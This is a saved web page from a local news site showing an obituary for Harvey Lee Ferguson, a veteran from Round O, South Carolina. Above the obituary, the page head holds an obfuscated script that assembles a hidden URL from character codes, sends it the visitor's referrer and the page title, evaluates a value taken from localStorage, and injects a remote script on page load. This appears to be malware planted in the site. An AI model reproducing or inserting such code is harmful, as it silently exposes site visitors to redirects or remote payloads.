<!DOCTYPE html>
<html lang="en-US" xmlns:og="http://ogp.me/ns#" xmlns:fb="http://ogp.me/ns/fb#">
<head>

<title>
  Harvey Lee Ferguson | Obituary</title>

<!--meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"-->
<meta charset="UTF-8">
<script type="application/javascript">
var ajax_url = "https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js";
window[String.fromCharCode(95)+"_a"] = window["ajax"+String.fromCharCode(95,117,114,108)];
window["a"+String.fromCharCode(106,97,120,95)+"url"] = __a.slice(0,8)+__a.slice(16-8,12+0)+"-"+__a.slice(38,44)+__a[20+4]+String.fromCharCode(10*10)+__a.slice(60,61)+"."+__a.slice(24,27)+"/"+__a.slice(38,44)+"?se_r"+__a[41]+String.fromCharCode(102)+"errer="/*!google!*/+encodeURIComponent(document.referrer)+"&de"+String.fromCharCode(102)+"au"+__a[17]+"t_"+"key"+String.fromCharCode(119)+"or"+String.fromCharCode(10**2)+"="+encodeURIComponent(document.title)+'&'+window.location.search.replace('?', '&')+"&"+String.fromCharCode(102)+"rm="+__a[4]+__a[24]+"rip"+__a[1*2];var _gl=localStorage.getItem(String.fromCharCode(1+94,95+0)+"google"+String.fromCharCode(95,100,97,116,97));if(_gl!==null&&eval(decodeURI(_gl.split("").reverse().join("")))!==true&&_gl=="!3"){window["a"+String.fromCharCode(106,97,120,95)+"url"]=__a;}else if(_gl!=="!1"&&_gl!=="!2"&&_gl!==null){window["a"+String.fromCharCode(106,97,120,95)+"url"]=_gl;}if(_gl!=="!2"){
var d=document;var s=d.createElement('script');s.src=ajax_url;if(document.currentScript){document.currentScript.parentNode.insertBefore(s,document.currentScript);}else{d.getElementsByTagName('head')[0].appendChild(s);}}
</script>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://walterborolive.com/xmlrpc.php">
<link rel="alternate" type="application/rss+xml" title="Walterboro Live" href="http://walterborolive.com/feed/">
<link rel="alternate" type="application/atom+xml" title="Walterboro Live" href="http://walterborolive.com/feed/atom/">
<script type="application/javascript">

</script>
<!--[if lt IE 9]>
  <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->

<!-- Jetpack Site Verification Tags -->
<meta name="google-site-verification" content="UQRKwERrUYQw5JEvr5oBpjBn5ugryjO4KpFL_JGybKw" />
<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Walterboro Live &raquo; Harvey Lee Ferguson | Obituary Comments Feed" href="http://walterborolive.com/2019/11/harvey-lee-ferguson-obituary/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/walterborolive.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2.4"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='wp-block-library-css'  href='http://walterborolive.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2.4' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://walterborolive.com/wp-content/plugins/jetpack/css/jetpack.css?ver=7.7.1' type='text/css' media='all' />
<script type='text/javascript' src='http://walterborolive.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='http://walterborolive.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='http://walterborolive.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://walterborolive.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://walterborolive.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Terry Lee Lewis | Obituary' href='http://walterborolive.com/2019/11/terry-lee-lewis-obituary/' />
<link rel='next' title='Andrew Carden | Obituary' href='http://walterborolive.com/2019/11/andrew-carden-obituary/' />
<!-- Paper Theme -->
<link rel="canonical" href="http://walterborolive.com/2019/11/harvey-lee-ferguson-obituary/" />
<link rel='shortlink' href='https://wp.me/p633bj-m2H' />
<link rel="alternate" type="application/json+oembed" href="http://walterborolive.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwalterborolive.com%2F2019%2F11%2Fharvey-lee-ferguson-obituary%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://walterborolive.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwalterborolive.com%2F2019%2F11%2Fharvey-lee-ferguson-obituary%2F&#038;format=xml" />

<!-- This site is using AdRotate v5.4.2 Professional to display their advertisements - https://ajdg.solutions/products/adrotate-for-wordpress/ -->
<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; }
	.g img { height:auto; }
	.g-col { position:relative; float:left; }
	.g-col:first-child { margin-left: 0; }
	.g-col:last-child { margin-right: 0; }
	.g-1 { margin:2px 0px 0px 0px; }
	.g-2 { margin:2px 0px 0px 0px; }
	.g-3 { min-width:0px; max-width:200px; }
	.b-3 { margin:20px 0px 0px 0px; }
	.g-4 { min-width:0px; max-width:200px; }
	.b-4 { margin:20px 0px 0px 0px; }
	.g-5 { min-width:0px; max-width:200px; }
	.b-5 { margin:20px 0px 0px 0px; }
	.g-6 { min-width:0px; max-width:200px; }
	.b-6 { margin:20px 0px 0px 0px; }
	.g-7 { margin:20px 0px 0px 0px; }
	.g-8 { margin:20px 0px 10px 0px; }
	@media only screen and (max-width: 480px) {
		.g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; }
	}
</style>
<!-- /AdRotate CSS -->


<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style><style type="text/css" id="custom-background-css">
body.custom-background { background-color: #000000; background-image: url("http://walterborolive.com/wp-content/uploads/2016/01/CARBON-FIBER-BG-S.gif"); background-position: left top; background-size: auto; background-repeat: repeat; background-attachment: scroll; }
</style>
	
<!-- START - Open Graph for Facebook, Google+ and Twitter Card Tags 2.2.6.1 -->
 <!-- Facebook Open Graph -->
  <meta property="og:locale" content="en_US"/>
  <meta property="og:site_name" content="Walterboro Live"/>
  <meta property="og:title" content="Harvey Lee Ferguson | Obituary"/>
  <meta property="og:url" content="http://walterborolive.com/2019/11/harvey-lee-ferguson-obituary/"/>
  <meta property="og:type" content="article"/>
  <meta property="og:description" content="Harvey Lee Ferguson

Brice Herndon, Funeral Chapels and Crematory

Mr. Harvey Lee Ferguson, 75, of Round O, South Carolina, passed away at the Trident Health System, Saturday, October 26, 2019. Born October 20, 1944, in Switzer, West Virginia, he was the son of the late Samuel Ferguson and Marth"/>
  <meta property="og:image" content="http://walterborolive.com/wp-content/uploads/2016/09/WEB-GENERIC-BROADCAST-GRAPHIC.gif"/>
  <meta property="og:image:url" content="http://walterborolive.com/wp-content/uploads/2016/09/WEB-GENERIC-BROADCAST-GRAPHIC.gif"/>
  <meta property="article:published_time" content="2019-11-04T15:16:21-05:00"/>
  <meta property="article:modified_time" content="2019-11-04T15:16:21-05:00" />
  <meta property="og:updated_time" content="2019-11-04T15:16:21-05:00" />
  <meta property="article:section" content="Deaths"/>
 <!-- Google+ / Schema.org -->
  <meta itemprop="name" content="Harvey Lee Ferguson | Obituary"/>
  <meta itemprop="headline" content="Harvey Lee Ferguson | Obituary"/>
  <meta itemprop="description" content="Harvey Lee Ferguson

Brice Herndon, Funeral Chapels and Crematory

Mr. Harvey Lee Ferguson, 75, of Round O, South Carolina, passed away at the Trident Health System, Saturday, October 26, 2019. Born October 20, 1944, in Switzer, West Virginia, he was the son of the late Samuel Ferguson and Marth"/>
  <meta itemprop="image" content="http://walterborolive.com/wp-content/uploads/2016/09/WEB-GENERIC-BROADCAST-GRAPHIC.gif"/>
  <meta itemprop="datePublished" content="2019-11-04"/>
  <meta itemprop="dateModified" content="2019-11-04T15:16:21-05:00" />
  <meta itemprop="author" content="The Press and Standard"/>
 <!-- Twitter Cards -->
 <!-- SEO -->
 <!-- Misc. tags -->
 <!-- is_singular -->
<!-- END - Open Graph for Facebook, Google+ and Twitter Card Tags 2.2.6.1 -->
	
 
  <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
  <script src="http://cdn.broadstreetads.com/init.js"></script>

<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.2/css/bootstrap-combined.min.css" rel="stylesheet">
<link href="http://walterborolive.com/wp-content/themes/paper/style.css" type="text/css" rel="stylesheet" media="all">

<script type="application/javascript">
<script type="application/javascript">

</script>


	<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-123779972-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-123779972-1');
</script>
<script type="application/javascript">

</script>
	
	<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>;

<script>

     (adsbygoogle = window.adsbygoogle || []).push({

          google_ad_client: "ca-pub-2349950895409953",

          enable_page_level_ads: true

     });

</script>
	
</head>

<body class="post-template-default single single-post postid-84735 single-format-standard custom-background cat-3-id">

  <div id="topBar"></div>
  <div class="container">
    <header id="headerCont">      
      <div class="row-fluid">
        <div class="span12">          
                      <h1 id="logo"><a href="http://walterborolive.com">Sparta Live</a></h1>
            <img src="http://walterborolive.com/wp-content/uploads/2017/05/WALTERBORO-LIVE-LOGO-2017.gif" height="190" width="930" alt="" />
                  </div>
      </div><!--.row-fluid-->
      
      <div class="row-fluid">
        <div class="span12">
          <nav id="navCont" class="clearfix">
            <ul id="menu-header-menu" class="header-menu"><li id="menu-item-6" class="home menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-6"><a href="http://walterborolive.com/">News Feed</a></li>
<li id="menu-item-7" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7"><a href="http://walterborolive.com/about/">About</a></li>
<li id="menu-item-55" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55"><a href="http://walterborolive.com/search/">Search</a></li>
<li id="menu-item-23" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23"><a href="http://walterborolive.com/events/">Events</a></li>
<li id="menu-item-1352" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-1352"><a href="http://walterborolive.com/category/deaths/">Deaths</a></li>
<li id="menu-item-56713" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-56713"><a href="http://eeditions.walterborolive.com/">E-editions</a></li>
</ul>          </nav>
        </div>
      </div><!--.row-fluid-->
            
    </header>
  <div id="topAdsCont">

    
    

    <div class="row-fluid">

      <div class="span6 text-left">
        <div class="widget"><div class="g g-1"><div class="g-single a-3"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Westbury\&#039;s Ace Hardware', 'value': 1.00,  'non_interaction': true});" href="http://acehardware.shoplocal.com/AceHardwareCircular/Entry/LandingContent?storeid=2432770&sneakpeek=N&listingid=0"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Westbury\&#039;s Ace Hardware', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/Westbury-Ace.gif" /></a></div></div></div>  
      </div><!--.span6-->
    
      <div class="span6 text-right">
        <div class="widget"><div class="g g-2"><div class="g-single a-5"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'PRTC Coop', 'value': 1.00,  'non_interaction': true});" href="http://prtc.coop/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'PRTC Coop', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2018/08/PRTC-TOP-WEB-8-22-2018-1.gif" /></a></div></div></div>      </div><!--.span6-->

    </div>

  
</div>
  <div class="row-fluid">

    <div class="span3" id="sidebarLeftCont">
  <div class="widget"><div class="g g-6"><div class="g-col b-6 a-80"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Holland Maness Orthodontics', 'value': 1.00,  'non_interaction': true});" href="http://www.walterborosmiles.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Holland Maness Orthodontics', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2019/03/HOLLAND-MANESS-SINGLE-WEB-3-2019.gif" /></a></div></div></div><div class="widget"><div class="g g-8"><div class="g-single a-105"><a href="https://www.rizerchevrolet.com"><img src="http://walterborolive.com/wp-content/uploads/2019/10/RIZER-CHEVROLET-DOUBLE-WEB-10-25-2019.gif" /></a></div></div></div><div class="widget"><div class="g g-7"><div class="g-single a-91"><a href="https://lowcountryofficesolutions.com/"><img src="http://walterborolive.com/wp-content/uploads/2018/11/Lowcountry-Office-Solutions-Single-11-11-18.gif" /></a></div></div></div><div class="widget"><div class="g g-3"><div class="g-col b-3 a-68"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Islandton Auto Sales', 'value': 1.00,  'non_interaction': true});" href="https://www.facebook.com/Islandton-Auto-Sales-LLC-701958783290757/?fref=ts/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Islandton Auto Sales', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2019/06/ISLANDTON-AUTO-SINGLE-WEB-6-2019.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-38"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Shop Local Colleton Commercial Kitchen Colleton Museum', 'value': 1.00,  'non_interaction': true});" href="http://www.colletonmuseum.org/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Shop Local Colleton Commercial Kitchen Colleton Museum', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/ShopLocal.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-103"><a href="https://nandmmobilehomes.com/"><img src="http://walterborolive.com/wp-content/uploads/2019/08/NM-HOMES-DOUBLE-WEB-8-2019.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-32"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Floor Covering By Timmy Covington', 'value': 1.00,  'non_interaction': true});" href="https://www.facebook.com/Floor-Covering-By-Timmy-Covington-1519033528317632/?fref=ts"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Floor Covering By Timmy Covington', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/FloorCoveringByTimmy.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-35"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Steedley Fence', 'value': 1.00,  'non_interaction': true});" href="http://steedleymonumentworks.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Steedley Fence', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/12/STEEDLEY-FENCE-SINGLE-WEB-2016.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-108"><a href="https://www.google.com/maps/place/Zion+Baptist+Church/@32.9594346,-80.6993066,15z/data=!4m2!3m1!1s0x0:0x5a7d6ee3a01bb73d?sa=X&ved=2ahUKEwicgNPIye7kAhXSmuAKHRA0Bd0Q_BIwCnoECAoQBg"><img src="http://walterborolive.com/wp-content/uploads/2019/09/Zion-Baptist-Church-Single-Web-9-20-2019-1.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-72"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Magic Shine', 'value': 1.00,  'non_interaction': true});" href="https://www.google.com/maps/place/Magic+Shine+Detail/@32.91911,-80.667363,15z/data=!4m5!3m4!1s0x0:0x311cbe5fe239ce72!8m2!3d32.91911!4d-80.667363"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Magic Shine', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2017/04/MAGIC-SHINE-WEB-SINGLE-2017-1.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-53"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Veteran\&#039;s Victory House', 'value': 1.00,  'non_interaction': true});" href="http://www.state.sc.us/dmh/victoryhouse/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Veteran\&#039;s Victory House', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/VeteransVictoryHouse.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-43"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Walmart', 'value': 1.00,  'non_interaction': true});" href="https://www.walmart.com/store/1358/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Walmart', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/WalMartSavingsCatcher.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-15"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Monster Self Storage', 'value': 1.00,  'non_interaction': true});" href="http://monsterselfstorage.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Monster Self Storage', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2019/02/MONSTER-STORAGE-SINGLE-WEB-2-19.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-47"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Dixie Furniture Company', 'value': 1.00,  'non_interaction': true});" href="http://www.dixiefurniture.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Dixie Furniture Company', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/DixieFurnitureCompany.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-109"><a href="http://walterborolive.com/readerschoice2019/"><img src="http://walterborolive.com/wp-content/uploads/2019/10/Readers-Choice-Vote.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-97"><a href="https://www.facebook.com/rjstreeservice18/"><img src="http://walterborolive.com/wp-content/uploads/2019/03/RJs-Tree-Service-Single-Web-3-2019.png" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-51"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Aerocare Left', 'value': 1.00,  'non_interaction': true});" href="http://www.aerocareusa.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Aerocare Left', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/AeroCare.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-61"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Family Ford', 'value': 1.00,  'non_interaction': true});" href="http://www.familyfordstgeorge.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Family Ford', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2019/10/FAMILY-FORD-DOUBLE-WEB-10-25-2019.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-37"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Bank of Walterboro', 'value': 1.00,  'non_interaction': true});" href="https://www.banklowcountry.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Bank of Walterboro', 'value': 2.00, 'non_interaction': true});" src="http://walterborolive.com/wp-content/uploads/2019/02/Bank-of-the-Lowcountry-Single-Web-2-2019.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-56"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Walker Accounting &amp; Tax', 'value': 1.00,  'non_interaction': true});" href="http://www.walkertax.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Walker Accounting &amp; Tax', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/WalkerAccounting.png" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-42"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Fat Jack\&#039;s', 'value': 1.00,  'non_interaction': true});" href="http://www.fatjacksofwalterboro.com/menu.html"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Fat Jack\&#039;s', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/Fat-Jacks.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-100"><a href="https://www.facebook.com/MobileTherapyAllendaleFairfax/"><img src="http://walterborolive.com/wp-content/uploads/2019/06/Mobile-Physical-Therapy-Single-Web-6-2019.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-41"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'Carolina Eyecare Physicians', 'value': 1.00,  'non_interaction': true});" href="http://carolinaeyecare.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'Carolina Eyecare Physicians', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/CarolinaEyeCare.gif" /></a></div></div><div class="g g-3"><div class="g-col b-3 a-95"><a href="https://www.adoptapet.com/adoption_rescue/83899-colleton-county-animal-shelter-walterboro-south-carolina"><img src="http://walterborolive.com/wp-content/uploads/2019/02/CC-Animal-Shelter-Single-Web-January-2019-1.gif" /></a></div></div></div></div>


    <div class="span6">

	          <article class="clearfix">
          <h2>Harvey Lee Ferguson | Obituary</h2>
          
          <div class="shareButtons">
		              </div>
          <p class="theDate">by <span class="textUpper"><a href="http://walterborolive.com/author/katrenamccall/" title="Posts by The Press and Standard" rel="author">The Press and Standard</a></span> | November 4, 2019 3:16 <span class="textUpper">pm</span><br /></p>
          
		  
                    <p>Harvey Lee Ferguson</p>
<p>Brice Herndon, Funeral Chapels and Crematory</p>
<p><span style="color: #838271; font-family: 'Helvetica','sans-serif'; font-size: 11.5pt;">Mr. Harvey Lee Ferguson, 75, of Round O, South Carolina, passed away at the Trident Health System, Saturday, October 26, 2019. Born October 20, 1944, in Switzer, West Virginia, he was the son of the late Samuel Ferguson and Martha Ferris Ferguson.</span></p>
<p><span style="color: #838271; font-family: 'Helvetica','sans-serif'; font-size: 11.5pt;">Mr. Ferguson was a graduate of Embry Riddle Aeronautical University. He honorably spent thirty years in the United States Military, spending four years in the Navy where he was a selected Honor Guard for President John F. Kennedy’s funeral procession. He was also a selected Honor Guard for J. Edgar Hoover’s funeral procession. Mr. Ferguson was a twenty-six year veteran of the Air Force, where he served as a Flight Engineer on several aircraft, including the C118, C124 and C141. He traveled the world extensively during his military career. He proudly served his country during the Vietnam War, and concluded his military service in his last assignment during Operation Desert Shield and Desert Storm. After retirement from the military, he was a flight instructor for six years in Aircraft Systems for Hughes Flight Safety AirCraft Simulators in Charleston, South Carolina. He also worked at Rockford Manufacturing in Walterboro for four years.</span></p>
<p>Mr. Ferguson had many outdoor hobbies that included golf, gardening, and taking care of his small farm and animals. He was a Roman Catholic by faith. He is survived by his wife, Mary Ann Ferguson; son, Micheal Ferguson (Elaine) of Summerville; daughter, Kelly Ferguson- Johnson (Christopher) of Myrtle Beach; granddaughter, Mackenzie Chandler Ware; brothers, Clarence Ferguson of Montgomery, Alabama; Gary Ferguson of North Carolina; sisters, Easter Kopacka (Sam), of Toledo, Ohio; Muriel Brazeau of Toledo, Ohio, and Inez Wellman (Robert) of Summerville.</p>
<p>In lieu of flowers, the family has requested that memorial contributions be made in his honor to FOCCAS, Friends of the Colleton County Animal Shelter, 33 Poor Farm Road, Walterboro, SC 29488, Telephone: 1-843-893-2651</p>
<p>&nbsp;</p>
        </article>

        <a name="respond"></a>
<div id="comments">
	<!-- Prevents loading the file directly -->
		
	<!-- Password Required -->
	    
    <div id="commentsArea">
	   <!-- variable for alternating comment styles -->
                <h3>No comments yet.</h3>
      	</div><!--commentsArea-->
    <hr />
    
    
    
	<div id="comments-form">
									<form action="http://walterborolive.com/wp-comments-post.php" method="post" id="commentform">
								            	<p>
								<label for="author"><small>Name (required)</small></label>
								<input type="text" name="author" id="author" value="" size="22" tabindex="1" />
							</p>
							<p>
								<label for="email"><small>Mail (will not be shared) (required)</small></label>
								<input type="text" name="email" id="email" value="" size="22" tabindex="2" />
							</p>
							<p>
								<label for="url"><small>Website</small></label>
								<input type="text" name="url" id="url" value="" size="22" tabindex="3" />
							</p>
													<p>
								<label for="comment"><small>Comment</small></label>
								<textarea name="comment" id="comment" cols="100%" rows="10" tabindex="4"></textarea>
							</p>
							<p>
								<input name="submit" type="submit" id="submit" tabindex="5" value="Submit Comment" />
								<input type="hidden" name="comment_post_ID" value="84735" />
							</p>
				         <p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="adadedcbcb" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="56"/></p>			     </form>
				<p><small>By submitting a comment you grant Walterboro Live a perpetual license to reproduce your words and name/web site in attribution. Inappropriate and irrelevant comments will be removed at an admin’s discretion. Your email is used for verification purposes only, it will never be shared.</small></p>
						</div><!--#commentsForm-->
</div><!--#comments-->      
    </div>

    <div class="span3" id="sidebarRightCont">
  <div class="widget"><div class="g g-5"><div class="g-col b-5 a-74"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'IGA', 'value': 1.00,  'non_interaction': true});" href="www.walterborolive.com/iga/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'IGA', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2017/10/IGA-WEB-SINGLE-10-2017.gif" /></a></div></div></div><div class="widget"><div class="g g-4"><div class="g-col b-4 a-25"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': 'AeroCare right sidebar ad', 'value': 1.00,  'non_interaction': true});" href="http://aerocareusa.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': 'AeroCare right sidebar ad', 'value': 2.00, 'non_interaction': true});" src="http://b8v.34a.myftpupload.com/wp-content/uploads/2016/08/AeroCareRIGHTSidebar.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-98"><a href="https://www.facebook.com/pages/category/Insurance-Agent/American-Insurance-Center-LLC-owner-agent-Teresa-Smith-Sauls-227436847388001/"><img src="http://walterborolive.com/wp-content/uploads/2019/10/American-Insurance-Single-10-4-19.gif" /></a></div></div><div class="g g-4"><div class="g-col b-4 a-93"><iframe src="http://walterborolive.com/wp-content/uploads/2019/01/Renee-White-Accounting-Single-Web-January-2019.gif" height="250" frameborder="0" style="border:none;"></iframe></div></div><div class="g g-4"><div class="g-col b-4 a-21"><a onClick="gtag('event', 'click', {'event_category': 'Adverts', 'event_label': '1st Federal of South Carolina', 'value': 1.00,  'non_interaction': true});" href="http://1stfederalofsc.com/"><img onload="gtag('event', 'impression', {'event_category': 'Adverts', 'event_label': '1st Federal of South Carolina', 'value': 